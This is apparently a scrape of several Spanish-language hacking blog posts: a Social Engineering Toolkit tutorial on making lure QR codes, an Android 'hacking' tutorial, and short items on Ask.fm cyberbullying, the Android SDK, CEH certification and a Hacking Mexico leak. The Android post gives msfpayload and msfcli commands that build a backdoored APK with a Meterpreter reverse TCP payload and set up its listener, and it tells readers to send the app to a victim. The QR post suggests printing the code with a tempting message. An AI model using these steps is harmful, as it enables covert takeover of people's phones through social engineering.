Crear QRCode con S.E.T[Social Engineering Toolkit].

Creación de QRCode [Con Social Engineering Toolkit]

Hola!
En esté paper explicaremos algo sencillo, que son las QRCode, ¿Como las
creamos?.Antes de nada os explicare que son , las QRCode , son los códigos que
escaneamos con android, algún ejemplo podría ser esté :

Esté seria un QRCode, para infectar [Claramente Falso . Solo un ejemplo de
Ing Social ] , vamos a crearlo, lo primero de todo abriremos “S.E.T” y
seleccionamos la 1º opción : “1) Social-Engineering Attacks ” :

Después seleccionamos la opción 9 → “9) QRCode Generator Attack

Vector” y les saldrá algo así ......

Ahora nos pedirá que metamos el url , del que crearemos el QRCode, ejemplo
si su no-ip es icebreaker.no-ip.biz pues lo ponen y le dará un QR , hacia su
No-IP , bueno sencillo ¿no? Lo colocamos y ya nos lo crea nos dará una ruta

,donde se aloja la imagen ,la abrimos y hay lo tendremos la imagen....

Bueno ya lo tendríamos creado solo, sacar por la impresora o colgarlo en alguna

web y preparar un mensaje jugoso... >:-D

Nuestra Página de Facebook-> https://www.facebook.com/groups/PentestSupport/

Saludos! de J0k3$

Como hackear un Android [Post + Videotutorial.]

Hola! , 

 En esté post aprenderás a entrar en un android , con la maravillosa herramienta llamada Metasploit , dirás  ¿Enserio? , se podría entrar en un Android, claro! Empecemos.....

1º.-Actualicen su Metasploit, para asegurarse de que se le cargara los exploits...etc pues estos que usaremos son Actuales.

2º.-Una vez hecho eso pondremos en Metasploit lo siguiente....

search Android

Bueno, ahora puedes ver que sacaron un Exploit Handler + 2 Payload! eso nos da la posibilidad de hacer un APK infectada! bien...!! Hagamos este Apk Infectada...... Para hacerlo usaremos "MsfPayload" se aria así -> 

sudo msfpayload android/meterpreter/reverse_tcp  LHOST="Tu ip/No-ip" LPORT=Puerto R > "Ruta+ Aplicación.apk"

Ejemplo : 

 sudo msfpayload android/meterpreter/reverse_tcp  LHOST=192.168.1.35 LPORT=23 R > /home/icebreaker/Escritorio/Hack.apk

Bueno con eso se les creara un Apk infectada, se lo enviamos y ponemos a la escucha nuestro exploit , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a
msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien
escrito....Bueno una vez hecho eso, cargamos el exploit ......

sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=”Su ip puesta en el backdoor” LPORT="Su puerto" E

Ejemplo:

sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcpLHOST=192.168.1.35 LPORT=25 E 

 Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... 

O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para

ver los comandos que nos brinda Meterpreter ,para esté dispositivo...

Bueno hay pueden , ir probando ya tienen su dispositivo infectado! , acá les dejo el video hecho por mí para que lo vean y prueben , también trae como me muevo dentro de el móvil...
Link del video.

Link PDF

Saludos de J0K3$/Icebreaker.

Piden el cierre de Ask.fm por ola de suicidios

El reciente suicidio de 5 adolescentes que participaban en la red social Ask.fm ha encendido las alarmas sobre el ciberbullying en la red. El padre de Hannah Smith, quien se suicidó a causa de comentarios maliciosos que recibió de usuarios anónimos, pidió a las autoridades británicas que se movilicen para conseguir el cierre de la popular red social. Una de las principales críticas contra Ask es la posibilidad de dejar comentarios de manera anónima, lo que permite la impunidad en casos de ciberbullying. 

Comenzando en Android

Desde hace un tiempo, ya casi se ha vuelto una moda lo de la programación, tener el “poder” para crear nuestras propias aplicaciones, se ha transformado en algo muy atrayente.

Antes de conocer lenguajes y algoritmos e incluso si quiera pensar en que vamos a programar, comenzaremos buscando las herramientas para esto…

Lo primero es bajar el SDK de Android,  “Lo pueden encontrar haciendo click acá”

Esto nos descargara lo que necesitamos, por ahora, Eclipse y el SDK, seguimos con la instalación de este último.

La instalación puede tardar un poco, al finalizar y abrir nuestro eclipse, ya se vera de forma distinta.

Como ven son cosas muy sencillas y fáciles de hacer, eclipse es un programa que viene de manera casi portable,  por lo cual no da problemas para su uso.

Les dejo con una imagen de cuando ya estamos comenzando a crear nuestra primera aplicación.

Hasta la proxima!

Certified Ethical Hacker Versión 8

Certified Ethical Hacker Versión 8 tiene como objetivo dotar a los hackers profesionales con conocimientos sobre diversas infraestructuras de red de seguridad. La certificación es expedida por el Consejo Internacional de Comercio Electrónico ( EC-Council). El trabajo de un hacker ético certificado es acceder a un sistema de ordenador y reparar una falla de seguridad informática. Ellos son contratados para llevar a cabo pruebas de penetración sobre la base de la solicitud del titular del sistema, por lo que no se considera piratería ilegal. En la Versión 8 CEH curso, usted aprenderá cómo implementar las últimas tecnologías de hacking que son utilizados por los autores de incurrir en daños en el sistema de seguridad. Técnicas de hacking se refieren a las intrusiones realizadas por un hacker para causar los programas informáticos actúan de manera inusual. Los estudiantes aprenderán sobre diferentes herramientas de hacking que puede producir daños en el sistema con unos pocos clics.

Hacking Mexico H̶a̶c̶k̶e̶r̶ Hacked

Desde hace unos días a sido publicado en internet un pastebin el cual tiene información
de Hacking Mexico, algunos se han adjudicado el ataque pero el "autor oficial" aun no esta
identificado.

Algunas de las cosas supuestamente publicadas son:
-Respaldo completo del servidor
-Bases de datos asociadas a la pagina

Entre otras cosas.


Pastebin con el supuesto ataque